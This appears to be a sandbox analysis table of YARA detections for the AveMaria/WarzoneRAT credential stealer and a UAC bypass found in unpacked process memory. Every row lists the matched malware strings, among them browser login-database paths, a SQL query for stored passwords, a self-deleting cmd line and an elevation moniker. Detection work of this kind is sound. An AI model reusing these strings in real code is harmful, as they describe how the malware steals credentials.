29.1.dbkyovyK.pif.400000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
29.1.dbkyovyK.pif.400000.3.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
29.1.dbkyovyK.pif.400000.3.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x1ac80:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x19464:$a2: SMTP Password 0x18518:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x1d9f0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x1abd0:$a5: for /F "usebackq tokens=*" %%A in (" 0x18ef0:$a6: \Torch\User Data\Default\Login Data 0x1db10:$a7: /n:%temp%\ellocnak.xml 0x19a50:$a8: "os_crypt":{"encrypted_key":" 0x1db40:$a9: Hey I'm Admin 0x1932c:$a10: \logins.json 0x199c8:$a11: Accounts\Account.rec0 0x1a958:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
29.1.dbkyovyK.pif.400000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x18b30:$a1: \Opera Software\Opera Stable\Login Data 0x18e58:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x186e0:$a3: \Google\Chrome\User Data\Default\Login Data
29.1.dbkyovyK.pif.400000.3.unpack	AveMaria_WarZone	unknown	unknown	0x1ac80:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1aa84:$str2: MsgBox.exe 0x1acec:$str4: \System32\cmd.exe 0x1a958:$str6: Ave_Maria 0x1a1b8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x19464:$str8: SMTP Password 0x186e0:$str11: \Google\Chrome\User Data\Default\Login Data 0x1a184:$str12: \sqlmap.dll 0x1d9f0:$str16: Elevation:Administrator!new 0x1db10:$str17: /n:%temp%
29.1.dbkyovyK.pif.400000.3.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x1d9f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
29.1.dbkyovyK.pif.400000.3.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x1ad2d:$r1: Classes\Folder\shell\open\command 0x1ad50:$k1: DelegateExecute
29.1.dbkyovyK.pif.400000.3.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x1a774:$s1: RDPClip 0x1ae4c:$s2: Grabber 0x1a958:$s3: Ave_Maria Stealer OpenSource 0x1aa58:$s4: \MidgetPorn\workspace\MsgBox.exe 0x1db10:$s6: /n:%temp%\ellocnak.xml 0x1db40:$s7: Hey I'm Admin
29.1.dbkyovyK.pif.400000.3.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x1aea8:$pwsh: powershell 0x1803b:$s2: User-Agent: 0x18234:$s4: LdrLoadDll 0x17abc:$v6: start
25.1.dbkyovyK.pif.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
25.1.dbkyovyK.pif.400000.0.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
25.1.dbkyovyK.pif.400000.0.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x1c680:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1ae64:$a2: SMTP Password 0x19f18:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x1c5d0:$a5: for /F "usebackq tokens=*" %%A in (" 0x1a8f0:$a6: \Torch\User Data\Default\Login Data 0x1b450:$a8: "os_crypt":{"encrypted_key":" 0x1ad2c:$a10: \logins.json 0x1b3c8:$a11: Accounts\Account.rec0 0x1c358:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
25.1.dbkyovyK.pif.400000.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a530:$a1: \Opera Software\Opera Stable\Login Data 0x1a858:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a0e0:$a3: \Google\Chrome\User Data\Default\Login Data
25.1.dbkyovyK.pif.400000.0.raw.unpack	AveMaria_WarZone	unknown	unknown	0x1c680:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1c484:$str2: MsgBox.exe 0x1c6ec:$str4: \System32\cmd.exe 0x1c358:$str6: Ave_Maria 0x1bbb8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x1ae64:$str8: SMTP Password 0x1a0e0:$str11: \Google\Chrome\User Data\Default\Login Data 0x1bb84:$str12: \sqlmap.dll
25.1.dbkyovyK.pif.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x1c72d:$r1: Classes\Folder\shell\open\command 0x1c750:$k1: DelegateExecute
25.1.dbkyovyK.pif.400000.0.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x1c8a8:$pwsh: powershell 0x19a3b:$s2: User-Agent: 0x19c34:$s4: LdrLoadDll 0x194bc:$v6: start
25.1.dbkyovyK.pif.400000.0.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
25.1.dbkyovyK.pif.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
25.1.dbkyovyK.pif.400000.0.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
25.1.dbkyovyK.pif.400000.0.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x1ac80:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x19464:$a2: SMTP Password 0x18518:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x1d9f0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x1abd0:$a5: for /F "usebackq tokens=*" %%A in (" 0x18ef0:$a6: \Torch\User Data\Default\Login Data 0x1db10:$a7: /n:%temp%\ellocnak.xml 0x19a50:$a8: "os_crypt":{"encrypted_key":" 0x1db40:$a9: Hey I'm Admin 0x1932c:$a10: \logins.json 0x199c8:$a11: Accounts\Account.rec0 0x1a958:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
25.1.dbkyovyK.pif.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x18b30:$a1: \Opera Software\Opera Stable\Login Data 0x18e58:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x186e0:$a3: \Google\Chrome\User Data\Default\Login Data
25.1.dbkyovyK.pif.400000.0.unpack	AveMaria_WarZone	unknown	unknown	0x1ac80:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1aa84:$str2: MsgBox.exe 0x1acec:$str4: \System32\cmd.exe 0x1a958:$str6: Ave_Maria 0x1a1b8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x19464:$str8: SMTP Password 0x186e0:$str11: \Google\Chrome\User Data\Default\Login Data 0x1a184:$str12: \sqlmap.dll 0x1d9f0:$str16: Elevation:Administrator!new 0x1db10:$str17: /n:%temp%
25.1.dbkyovyK.pif.400000.0.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x1d9f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
25.1.dbkyovyK.pif.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x1ad2d:$r1: Classes\Folder\shell\open\command 0x1ad50:$k1: DelegateExecute
25.1.dbkyovyK.pif.400000.0.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x1a774:$s1: RDPClip 0x1ae4c:$s2: Grabber 0x1a958:$s3: Ave_Maria Stealer OpenSource 0x1aa58:$s4: \MidgetPorn\workspace\MsgBox.exe 0x1db10:$s6: /n:%temp%\ellocnak.xml 0x1db40:$s7: Hey I'm Admin
25.1.dbkyovyK.pif.400000.0.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x1aea8:$pwsh: powershell 0x1803b:$s2: User-Agent: 0x18234:$s4: LdrLoadDll 0x17abc:$v6: start
8.2.pointer.com.123c8f48.5.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
8.2.pointer.com.123c8f48.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.pointer.com.123c8f48.5.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.2.pointer.com.123c8f48.5.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x1ac80:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x19464:$a2: SMTP Password 0x18518:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x1d9f0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x1abd0:$a5: for /F "usebackq tokens=*" %%A in (" 0x18ef0:$a6: \Torch\User Data\Default\Login Data 0x1db10:$a7: /n:%temp%\ellocnak.xml 0x19a50:$a8: "os_crypt":{"encrypted_key":" 0x1db40:$a9: Hey I'm Admin 0x1932c:$a10: \logins.json 0x199c8:$a11: Accounts\Account.rec0 0x1a958:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
8.2.pointer.com.123c8f48.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x18b30:$a1: \Opera Software\Opera Stable\Login Data 0x18e58:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x186e0:$a3: \Google\Chrome\User Data\Default\Login Data
8.2.pointer.com.123c8f48.5.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x1d9f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
8.2.pointer.com.123c8f48.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x1ad2d:$r1: Classes\Folder\shell\open\command 0x1ad50:$k1: DelegateExecute
8.2.pointer.com.123c8f48.5.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x1a774:$s1: RDPClip 0x1ae4c:$s2: Grabber 0x1a958:$s3: Ave_Maria Stealer OpenSource 0x1aa58:$s4: \MidgetPorn\workspace\MsgBox.exe 0x1db10:$s6: /n:%temp%\ellocnak.xml 0x1db40:$s7: Hey I'm Admin
8.2.pointer.com.123c8f48.5.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x1aea8:$pwsh: powershell 0x1803b:$s2: User-Agent: 0x18234:$s4: LdrLoadDll 0x17abc:$v6: start
8.2.pointer.com.126450d8.10.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
8.2.pointer.com.126450d8.10.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.pointer.com.126450d8.10.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.2.pointer.com.126450d8.10.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x1ac80:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x19464:$a2: SMTP Password 0x18518:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x1d9f0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x1abd0:$a5: for /F "usebackq tokens=*" %%A in (" 0x18ef0:$a6: \Torch\User Data\Default\Login Data 0x1db10:$a7: /n:%temp%\ellocnak.xml 0x19a50:$a8: "os_crypt":{"encrypted_key":" 0x1db40:$a9: Hey I'm Admin 0x1932c:$a10: \logins.json 0x199c8:$a11: Accounts\Account.rec0 0x1a958:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
8.2.pointer.com.126450d8.10.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x18b30:$a1: \Opera Software\Opera Stable\Login Data 0x18e58:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x186e0:$a3: \Google\Chrome\User Data\Default\Login Data
8.2.pointer.com.126450d8.10.raw.unpack	AveMaria_WarZone	unknown	unknown	0x1ac80:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1aa84:$str2: MsgBox.exe 0x1acec:$str4: \System32\cmd.exe 0x1a958:$str6: Ave_Maria 0x1a1b8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x19464:$str8: SMTP Password 0x186e0:$str11: \Google\Chrome\User Data\Default\Login Data 0x1a184:$str12: \sqlmap.dll 0x1d9f0:$str16: Elevation:Administrator!new 0x1db10:$str17: /n:%temp%
8.2.pointer.com.126450d8.10.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x1d9f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
8.2.pointer.com.126450d8.10.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x1ad2d:$r1: Classes\Folder\shell\open\command 0x1ad50:$k1: DelegateExecute
8.2.pointer.com.126450d8.10.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x1a774:$s1: RDPClip 0x1ae4c:$s2: Grabber 0x1a958:$s3: Ave_Maria Stealer OpenSource 0x1aa58:$s4: \MidgetPorn\workspace\MsgBox.exe 0x1db10:$s6: /n:%temp%\ellocnak.xml 0x1db40:$s7: Hey I'm Admin
8.2.pointer.com.126450d8.10.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x1aea8:$pwsh: powershell 0x1803b:$s2: User-Agent: 0x18234:$s4: LdrLoadDll 0x17abc:$v6: start 0x2204e:$v6: start
23.2.Kyvoykbd.PIF.123c4b88.1.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
14.3.dbkyovyK.pif.2fde45b0.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.3.dbkyovyK.pif.2fde45b0.5.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
14.3.dbkyovyK.pif.2fde45b0.5.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x4ba8:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x338c:$a2: SMTP Password 0x2440:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x4af8:$a5: for /F "usebackq tokens=*" %%A in (" 0x2e18:$a6: \Torch\User Data\Default\Login Data 0x3978:$a8: "os_crypt":{"encrypted_key":" 0x3254:$a10: \logins.json 0x38f0:$a11: Accounts\Account.rec0 0x4880:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
14.3.dbkyovyK.pif.2fde45b0.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2a58:$a1: \Opera Software\Opera Stable\Login Data 0x2d80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2608:$a3: \Google\Chrome\User Data\Default\Login Data
14.3.dbkyovyK.pif.2fde45b0.5.raw.unpack	AveMaria_WarZone	unknown	unknown	0x4ba8:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x49ac:$str2: MsgBox.exe 0x4c14:$str4: \System32\cmd.exe 0x4880:$str6: Ave_Maria 0x40e0:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x338c:$str8: SMTP Password 0x2608:$str11: \Google\Chrome\User Data\Default\Login Data 0x40ac:$str12: \sqlmap.dll
14.3.dbkyovyK.pif.2fde45b0.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x4c55:$r1: Classes\Folder\shell\open\command 0x4c78:$k1: DelegateExecute
14.3.dbkyovyK.pif.2fde45b0.5.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x4dd0:$pwsh: powershell 0x1f63:$s2: User-Agent: 0x215c:$s4: LdrLoadDll 0x19e4:$v6: start
29.2.dbkyovyK.pif.400000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.dbkyovyK.pif.400000.1.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
23.2.Kyvoykbd.PIF.123a7f18.2.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
23.2.Kyvoykbd.PIF.123a7f18.2.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
23.2.Kyvoykbd.PIF.123c4b88.1.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
29.2.dbkyovyK.pif.400000.1.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
14.2.dbkyovyK.pif.400000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.pointer.com.123e5bb8.4.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
23.2.Kyvoykbd.PIF.123a7f18.2.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x19280:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x17a64:$a2: SMTP Password 0x1bff0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x191d0:$a5: for /F "usebackq tokens=*" %%A in (" 0x1c110:$a7: /n:%temp%\ellocnak.xml 0x18050:$a8: "os_crypt":{"encrypted_key":" 0x1c140:$a9: Hey I'm Admin 0x1792c:$a10: \logins.json 0x17fc8:$a11: Accounts\Account.rec0 0x18f58:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
29.2.dbkyovyK.pif.400000.1.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x1c680:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1ae64:$a2: SMTP Password 0x19f18:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x1c5d0:$a5: for /F "usebackq tokens=*" %%A in (" 0x1a8f0:$a6: \Torch\User Data\Default\Login Data 0x1b450:$a8: "os_crypt":{"encrypted_key":" 0x1ad2c:$a10: \logins.json 0x1b3c8:$a11: Accounts\Account.rec0 0x1c358:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
14.2.dbkyovyK.pif.400000.1.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
29.2.dbkyovyK.pif.400000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a530:$a1: \Opera Software\Opera Stable\Login Data 0x1a858:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a0e0:$a3: \Google\Chrome\User Data\Default\Login Data
23.2.Kyvoykbd.PIF.123a7f18.2.unpack	AveMaria_WarZone	unknown	unknown	0x19280:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x19084:$str2: MsgBox.exe 0x192ec:$str4: \System32\cmd.exe 0x18f58:$str6: Ave_Maria 0x187b8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x17a64:$str8: SMTP Password 0x18784:$str12: \sqlmap.dll 0x1bff0:$str16: Elevation:Administrator!new 0x1c110:$str17: /n:%temp%
23.2.Kyvoykbd.PIF.123a7f18.2.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x1bff0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
23.2.Kyvoykbd.PIF.123a7f18.2.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x1932d:$r1: Classes\Folder\shell\open\command 0x19350:$k1: DelegateExecute
23.2.Kyvoykbd.PIF.123a7f18.2.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x18d74:$s1: RDPClip 0x1944c:$s2: Grabber 0x18f58:$s3: Ave_Maria Stealer OpenSource 0x19058:$s4: \MidgetPorn\workspace\MsgBox.exe 0x1c110:$s6: /n:%temp%\ellocnak.xml 0x1c140:$s7: Hey I'm Admin
8.2.pointer.com.123e5bb8.4.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
14.2.dbkyovyK.pif.400000.1.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x1ac80:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x19464:$a2: SMTP Password 0x18518:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x1d9f0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x1abd0:$a5: for /F "usebackq tokens=*" %%A in (" 0x18ef0:$a6: \Torch\User Data\Default\Login Data 0x1db10:$a7: /n:%temp%\ellocnak.xml 0x19a50:$a8: "os_crypt":{"encrypted_key":" 0x1db40:$a9: Hey I'm Admin 0x1932c:$a10: \logins.json 0x199c8:$a11: Accounts\Account.rec0 0x1a958:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
29.2.dbkyovyK.pif.400000.1.raw.unpack	AveMaria_WarZone	unknown	unknown	0x1c680:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1c484:$str2: MsgBox.exe 0x1c6ec:$str4: \System32\cmd.exe 0x1c358:$str6: Ave_Maria 0x1bbb8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x1ae64:$str8: SMTP Password 0x1a0e0:$str11: \Google\Chrome\User Data\Default\Login Data 0x1bb84:$str12: \sqlmap.dll
14.2.dbkyovyK.pif.400000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x18b30:$a1: \Opera Software\Opera Stable\Login Data 0x18e58:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x186e0:$a3: \Google\Chrome\User Data\Default\Login Data
29.2.dbkyovyK.pif.400000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x1c72d:$r1: Classes\Folder\shell\open\command 0x1c750:$k1: DelegateExecute
14.2.dbkyovyK.pif.400000.1.unpack	AveMaria_WarZone	unknown	unknown	0x1ac80:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1aa84:$str2: MsgBox.exe 0x1acec:$str4: \System32\cmd.exe 0x1a958:$str6: Ave_Maria 0x1a1b8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x19464:$str8: SMTP Password 0x186e0:$str11: \Google\Chrome\User Data\Default\Login Data 0x1a184:$str12: \sqlmap.dll 0x1d9f0:$str16: Elevation:Administrator!new 0x1db10:$str17: /n:%temp%
14.2.dbkyovyK.pif.400000.1.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x1d9f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
29.2.dbkyovyK.pif.400000.1.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x1c8a8:$pwsh: powershell 0x19a3b:$s2: User-Agent: 0x19c34:$s4: LdrLoadDll 0x194bc:$v6: start
14.2.dbkyovyK.pif.400000.1.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x1ad2d:$r1: Classes\Folder\shell\open\command 0x1ad50:$k1: DelegateExecute
14.2.dbkyovyK.pif.400000.1.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x1a774:$s1: RDPClip 0x1ae4c:$s2: Grabber 0x1a958:$s3: Ave_Maria Stealer OpenSource 0x1aa58:$s4: \MidgetPorn\workspace\MsgBox.exe 0x1db10:$s6: /n:%temp%\ellocnak.xml 0x1db40:$s7: Hey I'm Admin
14.2.dbkyovyK.pif.400000.1.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x1aea8:$pwsh: powershell 0x1803b:$s2: User-Agent: 0x18234:$s4: LdrLoadDll 0x17abc:$v6: start
8.2.pointer.com.123c8f48.5.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
8.2.pointer.com.123c8f48.5.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.2.pointer.com.123c8f48.5.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x19280:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x17a64:$a2: SMTP Password 0x1bff0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x191d0:$a5: for /F "usebackq tokens=*" %%A in (" 0x1c110:$a7: /n:%temp%\ellocnak.xml 0x18050:$a8: "os_crypt":{"encrypted_key":" 0x1c140:$a9: Hey I'm Admin 0x1792c:$a10: \logins.json 0x17fc8:$a11: Accounts\Account.rec0 0x18f58:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
8.2.pointer.com.123c8f48.5.unpack	AveMaria_WarZone	unknown	unknown	0x19280:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x19084:$str2: MsgBox.exe 0x192ec:$str4: \System32\cmd.exe 0x18f58:$str6: Ave_Maria 0x187b8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x17a64:$str8: SMTP Password 0x18784:$str12: \sqlmap.dll 0x1bff0:$str16: Elevation:Administrator!new 0x1c110:$str17: /n:%temp%
8.2.pointer.com.123c8f48.5.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x1bff0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
8.2.pointer.com.123c8f48.5.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x1932d:$r1: Classes\Folder\shell\open\command 0x19350:$k1: DelegateExecute
8.2.pointer.com.123c8f48.5.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x18d74:$s1: RDPClip 0x1944c:$s2: Grabber 0x18f58:$s3: Ave_Maria Stealer OpenSource 0x19058:$s4: \MidgetPorn\workspace\MsgBox.exe 0x1c110:$s6: /n:%temp%\ellocnak.xml 0x1c140:$s7: Hey I'm Admin
14.3.dbkyovyK.pif.2fdf7880.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.3.dbkyovyK.pif.2fdf7880.3.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
14.3.dbkyovyK.pif.2fdf7880.3.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x4ba8:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x338c:$a2: SMTP Password 0x2440:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x4af8:$a5: for /F "usebackq tokens=*" %%A in (" 0x2e18:$a6: \Torch\User Data\Default\Login Data 0x3978:$a8: "os_crypt":{"encrypted_key":" 0x3254:$a10: \logins.json 0x38f0:$a11: Accounts\Account.rec0 0x4880:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
